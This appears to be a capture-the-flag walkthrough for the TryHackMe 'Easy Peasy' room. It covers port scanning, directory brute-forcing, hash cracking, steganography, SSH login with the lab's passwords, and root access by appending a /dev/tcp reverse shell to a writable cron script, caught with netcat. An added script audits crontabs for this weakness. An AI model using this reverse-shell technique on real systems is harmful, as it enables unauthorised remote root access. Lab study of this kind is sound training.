Easy Peasy
Room Link: https://tryhackme.com/room/easypeasyctf
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Ports 5698 and 65524 found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

Flag #1
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


Kali
gobuster dir -u http://$VICTIM/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt



Kali
echo "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d

Flag #2
Kali
curl http://$VICTIM:65524/robots.txt

https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250

Flag #3

Hidden Directory



Crack the Hash
Kali
wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py
python hash-id.py 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

Format turned out to be GOST
Kali
john --wordlist=easypeasy.txt --format=GOST hash.txt

SSH Password
Kali
wget http://$VICTIM:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
steghide extract -sf binarycodepixabay.jpg
Password: mypasswordforthatjob


Link: https://www.rapidtables.com/convert/number/binary-to-ascii.html

Kali
ssh boring@$VICTIM -p 6498
Password: iconvertedmypasswordtobinary

User Flag

Link: https://www.dcode.fr/caesar-cipher

Privilege Escalation
Victim
cat /etc/crontab
cd /var/www/
ls -lah


Victim
echo "sh -i >& /dev/tcp/$KALI/1337 0>&1" >> .mysecretcronjob.sh
Kali
nc -lvnp 1337
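
The escalation above relies on a cron-run script that the unprivileged login user can modify. The defender-side check below is an added example, not part of the original write-up: it lists files referenced by root entries in a system crontab that someone other than the trusted owner could change. The function names and the TRUSTED_UID variable are assumptions of this sketch.

```shell
#!/bin/sh
# Added example: flag files run from root entries in a system crontab that
# someone other than the trusted owner can modify.
# TRUSTED_UID (default 0) and both function names are assumptions of this sketch.

# Succeeds and prints the path if it, or its parent directory, is not owned
# by the trusted uid or is group/world writable.
unsafe_path() {
    p=$1
    trusted=${TRUSTED_UID:-0}
    for target in "$p" "$(dirname "$p")"; do
        hit=$(find -L "$target" -prune \
            \( ! -user "$trusted" -o -perm -020 -o -perm -002 \) -print 2>/dev/null)
        if [ -n "$hit" ]; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# $1: file in system crontab format (min hour dom mon dow user command...)
# Returns 1 if at least one modifiable file was reported.
audit_crontab() {
    status=0
    set -f    # do not glob-expand '*' inside command strings
    while read -r m h dom mon dow user cmd; do
        case $m in
            ''|'#'*|*=*) continue ;;                        # blank, comment, VAR=value
            @*) cmd="$dom $mon $dow $user $cmd"; user=$h ;; # @reboot user command...
        esac
        [ "$user" = root ] || continue
        for word in $cmd; do
            case $word in /*) ;; *) continue ;; esac        # absolute paths only
            [ -f "$word" ] || continue
            if unsafe_path "$word"; then status=1; fi
        done
    done < "$1"
    set +f
    return $status
}

# Stand-alone use: sh audit.sh /etc/crontab
if [ "$#" -gt 0 ]; then audit_crontab "$1"; fi
```

Relative script names (for example one invoked after a `cd`) are not resolved by this sketch, so review those entries by hand.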
